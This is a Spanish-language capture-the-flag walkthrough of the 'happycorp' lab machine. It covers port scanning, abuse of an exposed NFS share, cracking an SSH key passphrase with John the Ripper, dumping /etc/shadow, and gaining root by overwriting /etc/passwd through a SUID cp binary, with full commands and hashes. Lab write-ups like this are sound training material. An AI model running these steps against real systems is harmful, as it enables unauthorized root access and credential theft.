happycorp john - danielcastropalomares/security GitHub Wiki
Con un primer escaneo encontramos los siguientes puertos abiertos:
root@kali:~# nmap -p- 172.31.255.105
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-05-19 19:14 CEST
Nmap scan report for 172.31.255.105
Host is up (0.00016s latency).
Not shown: 65527 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
35767/tcp open unknown
39189/tcp open unknown
44537/tcp open unknown
48555/tcp open unknown
MAC Address: 6C:40:08:BB:1C:56 (Apple)
Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds
root@kali:~#
root@kali:~# nmap -A 172.31.255.105
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-05-19 19:15 CEST
Nmap scan report for 172.31.255.105
Host is up (0.00034s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin.php
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Happycorp
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/udp nfs
| 100005 1,2,3 44537/tcp mountd
| 100005 1,2,3 57024/udp mountd
| 100021 1,3,4 37935/udp nlockmgr
| 100021 1,3,4 39189/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
MAC Address: 6C:40:08:BB:1C:56 (Apple)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms 172.31.255.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
Con nikto encontramos lo siguiente:
root@kali:~# nikto --host 172.31.255.105
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.105
+ Target Hostname: 172.31.255.105
+ Target Port: 80
+ Start Time: 2019-05-19 19:19:57 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x8825 0x58340bcff7e6c
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/admin.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
Con osmodeus:
[19:20:22] 200 - 469B - /admin.php
[19:20:35] 301 - 314B - /css -> http://172.31.255.105/css/
[19:20:37] 301 - 314B - /img -> http://172.31.255.105/img/
[19:20:37] 200 - 34KB - /index.html
[19:20:38] 301 - 314B - /lib -> http://172.31.255.105/lib/
[19:20:38] 200 - 626B - /manual/index.html
[19:20:38] 301 - 317B - /manual -> http://172.31.255.105/manual/
En el código de la web del admin.php:
root@kali:~# curl http://172.31.255.105/admin.php
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
<center><br />
<h2>Happycorp Super Secure login</h2>
<br />
<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- That computer thingy about db and such doesn't work so I just hard coded it - Rodney -->
</form></div>
Con el usuario heather nos aparece el error invalid password, así que este usuario existe:
http://172.31.255.105/admin.php
Happycorp Super Secure login
Invalid password
Username:
Password:
Login
Revisamos NFS y vemos que se está compartiendo la home del usuario karl:
root@kali:~# showmount -e 172.31.255.105
Export list for 172.31.255.105:
/home/karl *
Montamos la home del usuario karl en /mnt/:
root@kali:~# showmount -e 172.31.255.105
Export list for 172.31.255.105:
/home/karl *
Listamos el directorio:
root@kali:/mnt# ls -liath
total 28K
918344 drwxr-xr-x 3 1001 1001 4,0K mar 5 11:15 .
918347 -rw-r--r-- 1 1001 1001 3,5K mar 5 11:15 .bashrc
918200 lrwxrwxrwx 1 root root 9 mar 5 11:11 .bash_history -> /dev/null
918351 drwx------ 2 1001 1001 4,0K mar 5 11:10 .ssh
918199 -rw------- 1 1001 1001 28 mar 5 02:55 .lesshst
918348 -rw-r--r-- 1 1001 1001 220 mar 4 22:09 .bash_logout
918345 -rw-r--r-- 1 1001 1001 675 mar 4 22:09 .profile
2 drwxr-xr-x 18 root root 4,0K dic 3 21:24 ..
Como vemos que solo el usuario 1001 puede editar .ssh, vamos a crear el usuario karl con el UID 1001:
root@kali:~# adduser karl --uid 1001
Adding user `karl' ...
Adding new group `karl' (1001) ...
Adding new user `karl' (1001) with group `karl' ...
Creating home directory `/home/karl' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for karl
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
Ahora ya vemos los permisos correctamente:
root@kali:/mnt# ls -liath
total 28K
918344 drwxr-xr-x 3 karl karl 4,0K mar 5 11:15 .
918347 -rw-r--r-- 1 karl karl 3,5K mar 5 11:15 .bashrc
918200 lrwxrwxrwx 1 root root 9 mar 5 11:11 .bash_history -> /dev/null
918351 drwx------ 2 karl karl 4,0K mar 5 11:10 .ssh
918199 -rw------- 1 karl karl 28 mar 5 02:55 .lesshst
918348 -rw-r--r-- 1 karl karl 220 mar 4 22:09 .bash_logout
918345 -rw-r--r-- 1 karl karl 675 mar 4 22:09 .profile
2 drwxr-xr-x 18 root root 4,0K dic 3 21:24 ..
Iniciamos sesión con karl y accedemos al directorio .ssh:
root@kali:~# su - karl
karl@kali:~$
karl@kali:~$ cd /mnt/
karl@kali:/mnt$ ls
karl@kali:/mnt$ ls -liath
total 28K
918344 drwxr-xr-x 3 karl karl 4.0K Mar 5 11:15 .
918347 -rw-r--r-- 1 karl karl 3.5K Mar 5 11:15 .bashrc
918200 lrwxrwxrwx 1 root root 9 Mar 5 11:11 .bash_history -> /dev/null
918351 drwx------ 2 karl karl 4.0K Mar 5 11:10 .ssh
918199 -rw------- 1 karl karl 28 Mar 5 02:55 .lesshst
918348 -rw-r--r-- 1 karl karl 220 Mar 4 22:09 .bash_logout
918345 -rw-r--r-- 1 karl karl 675 Mar 4 22:09 .profile
2 drwxr-xr-x 18 root root 4.0K Dec 3 21:24 ..
karl@kali:/mnt$ cd .ssh/
karl@kali:/mnt/.ssh$
Encontramos la primera flag:
karl@kali:/mnt/.ssh$ cat user.txt
flag1{Z29vZGJveQ}
La llave SSH que se encuentra dentro del authorized_keys corresponde a la misma que la del usuario karl:
karl@kali:/mnt/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDNiAQUpuxbe7Urm0OHSwVJqx0xSTApeX+e6YcNE1Yv0EWPQsDu3d737H0dIhG/l3ftjGbFLshiXkQkdPun96Y0V6CXm7YtAOI2ga1M83ApRDzFsCvSteXBECZHHhACB7gjdidrW6aohTlqZCcEkyEOEb2Mt8nHTA+dfmaRwqJl1nMzO5l4cTg/rN3TiMwAa+lyjjjxJ0v2tvRde+VOafunF+/vYrafhtgg3ECMxp9SSnD4NxU0fhX9eYdTcZkFb17Py5Bi8aZ4dWkuUrSIAIBXyF5voHIrZcOywmdauHhwbIWagqblvHtTjpoqzunRH6nicSZGEFsilQ943HOPSigyi6bKx+vK9aj+o4JsnMX3qyz1F0M7Nrzdc4rF1PZ2ViIl7PnhmwIFOpjRRcu/N+WB93gU9d4A6S/s2z+mkIghTme24IqPylZD9Rpol08je+KLXvtSg/Ypojruz6/zSl2FYVd9i53Sm3afp9P1OHQWllCVLv+xxiCI/c2r/bK9lE15vhzaSvaRrXchOX0Hnt0oiBXsIC/TMFzNwsy8RMzLpaxoHIK76CN8fPVulX+VmD7xqx6hQqS9fPsJTKikJjLz5laqLHbhHpaChSl/5PHZuafI3Li2QjUEt+RvyBAVUuGzRT8dwGOLDBB2+FK4Slu65AGkDfkDm9C1/9K8dGVm7Q== karl@happycorp
karl@kali:/mnt/.ssh$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDNiAQUpuxbe7Urm0OHSwVJqx0xSTApeX+e6YcNE1Yv0EWPQsDu3d737H0dIhG/l3ftjGbFLshiXkQkdPun96Y0V6CXm7YtAOI2ga1M83ApRDzFsCvSteXBECZHHhACB7gjdidrW6aohTlqZCcEkyEOEb2Mt8nHTA+dfmaRwqJl1nMzO5l4cTg/rN3TiMwAa+lyjjjxJ0v2tvRde+VOafunF+/vYrafhtgg3ECMxp9SSnD4NxU0fhX9eYdTcZkFb17Py5Bi8aZ4dWkuUrSIAIBXyF5voHIrZcOywmdauHhwbIWagqblvHtTjpoqzunRH6nicSZGEFsilQ943HOPSigyi6bKx+vK9aj+o4JsnMX3qyz1F0M7Nrzdc4rF1PZ2ViIl7PnhmwIFOpjRRcu/N+WB93gU9d4A6S/s2z+mkIghTme24IqPylZD9Rpol08je+KLXvtSg/Ypojruz6/zSl2FYVd9i53Sm3afp9P1OHQWllCVLv+xxiCI/c2r/bK9lE15vhzaSvaRrXchOX0Hnt0oiBXsIC/TMFzNwsy8RMzLpaxoHIK76CN8fPVulX+VmD7xqx6hQqS9fPsJTKikJjLz5laqLHbhHpaChSl/5PHZuafI3Li2QjUEt+RvyBAVUuGzRT8dwGOLDBB2+FK4Slu65AGkDfkDm9C1/9K8dGVm7Q== karl@happycorp
El problema es que la key se encuentra encriptada:
karl@kali:/mnt/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,A6E2D064459881EDB840A03CF87FC98C
Vamos a intentar de fuerça bruta con jon ripper y encontramos que el password es sheep:
root@kali:/tmp/ssh# ssh2john id_rsa > id_rsa.hash
root@kali:/tmp/ssh# john -wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep (id_rsa)
1g 0:00:00:00 DONE (2019-05-19 19:57) 14.28g/s 230742p/s 230742c/s 230742C/s sheep
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Ahora ya podemos acceder por ssh:
karl@kali:/mnt/.ssh$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 5 05:10:07 2019 from 192.168.207.129
rbash: warning: shell level (1000) too high, resetting to 1
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
ls
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$
karl@happycorp:~$
karl@happycorp:~$ ls
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
El problema que nos encontramos nada mas entrar, es que parece que se están abriendo multitud de shells y el sistema se queda sin memoria. Si revisamos el fichero .bashrc encntraomos /bin/rbash. Comentamos esta línea y probamos de volver a entrar al sistema:
karl@happycorp:~$ cat .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
#/bin/rbash
Ahora sin problemas:
root@kali:/tmp/ssh# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 19 14:04:25 2019 from 172.31.255.129
karl@happycorp:~$
karl@happycorp:~$
Revisamos los directorios de cron, pero no encontramos nada fuera de lo normal:
karl@happycorp:~$ ls -liath /etc/cron*
655584 -rw-r--r-- 1 root root 722 Oct 7 2017 /etc/crontab
/etc/cron.d:
total 16K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655575 drwxr-xr-x 2 root root 4.0K Mar 4 03:45 .
655576 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
655448 -rw-r--r-- 1 root root 712 Jan 1 2017 php
/etc/cron.daily:
total 40K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655382 drwxr-xr-x 2 root root 4.0K Mar 4 03:31 .
655568 -rwxr-xr-x 1 root root 1.5K Jan 18 05:42 apt-compat
655968 -rwxr-xr-x 1 root root 539 Nov 3 2018 apache2
655383 -rwxr-xr-x 1 root root 1.6K Jun 25 2018 dpkg
655577 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
655430 -rwxr-xr-x 1 root root 249 May 17 2017 passwd
655798 -rwxr-xr-x 1 root root 1.1K Dec 13 2016 man-db
655554 -rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
655628 -rwxr-xr-x 1 root root 89 May 5 2015 logrotate
/etc/cron.weekly:
total 16K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655582 drwxr-xr-x 2 root root 4.0K Mar 4 03:31 .
655583 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
655799 -rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
/etc/cron.monthly:
total 12K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655580 drwxr-xr-x 2 root root 4.0K Mar 4 03:28 .
655581 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
/etc/cron.hourly:
total 12K
655361 drwxr-xr-x 78 root root 4.0K May 19 14:08 ..
655578 drwxr-xr-x 2 root root 4.0K Mar 4 03:28 .
655579 -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
A nivel de ps aux no encontramos ningún proceso interesante. Buscamos fichero con el SUID modificado y encontramos el binario cp:
karl@happycorp:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/sbin/mount.nfs
/bin/mount
/bin/ping
/bin/cp
/bin/umount
/bin/su
karl@happycorp:~$ ls -liath /bin/cp
131216 -rwsr-xr-x 1 root root 128K Feb 22 2017 /bin/cp
Por ejemplo podemos copiar el fichero shadow:
karl@happycorp:~$ cp /etc/shadow /tmp/
karl@happycorp:~$
karl@happycorp:~$ cat /tmp/shadow
root:$6$WagaBS05$3dmSGltBbONiMHGd353CH8MIpWphIm1mF3HYvL3lLk752ERIPsq5aecGTi.5/UQ6Ni5UvpTR4F10BPZBOSMru/:17960:0:99999:7:::
daemon:*:17959:0:99999:7:::
bin:*:17959:0:99999:7:::
sys:*:17959:0:99999:7:::
sync:*:17959:0:99999:7:::
games:*:17959:0:99999:7:::
man:*:17959:0:99999:7:::
lp:*:17959:0:99999:7:::
mail:*:17959:0:99999:7:::
news:*:17959:0:99999:7:::
uucp:*:17959:0:99999:7:::
proxy:*:17959:0:99999:7:::
www-data:*:17959:0:99999:7:::
backup:*:17959:0:99999:7:::
list:*:17959:0:99999:7:::
irc:*:17959:0:99999:7:::
gnats:*:17959:0:99999:7:::
nobody:*:17959:0:99999:7:::
systemd-timesync:*:17959:0:99999:7:::
systemd-network:*:17959:0:99999:7:::
systemd-resolve:*:17959:0:99999:7:::
systemd-bus-proxy:*:17959:0:99999:7:::
_apt:*:17959:0:99999:7:::
messagebus:*:17959:0:99999:7:::
sshd:*:17959:0:99999:7:::
karl:$6$5K/tvCeV$kdQ9dg5e9dw/b4CZG94k7Jtd/W481ycVfuRhnRktf4qW.txc446j91HtGFOh26vy1zNgKJHgzke77xNpRecHZ/:17959:0:99999:7:::
statd:*:17960:0:99999:7:::
Intentamos desencriptar con john sin éxito:
root@kali:/tmp/happycorp# john -wordlist=/usr/share/wordlists/rockyou.txt mypasswd
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Lo que vamos a hacer es editar el fichero passwd para que no nos pida el password al acceder con el usuario root, para ello modificaremos la línea root:
root:x:0:0:root:/root:/bin/bash
Por esta:
root::0:0:root:/root:/bin/bash
LFILE=/etc/passwd
TF=$(mktemp)
echo "root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
karl:x:1001:1001:,,,:/home/karl:/bin/bash
statd:x:107:65534::/var/lib/nfs:/bin/false" > $TF
./cp $TF $LFILE
Ahora si probamos de acceder con root con su:
karl@happycorp:~$ su - root
root@happycorp:~#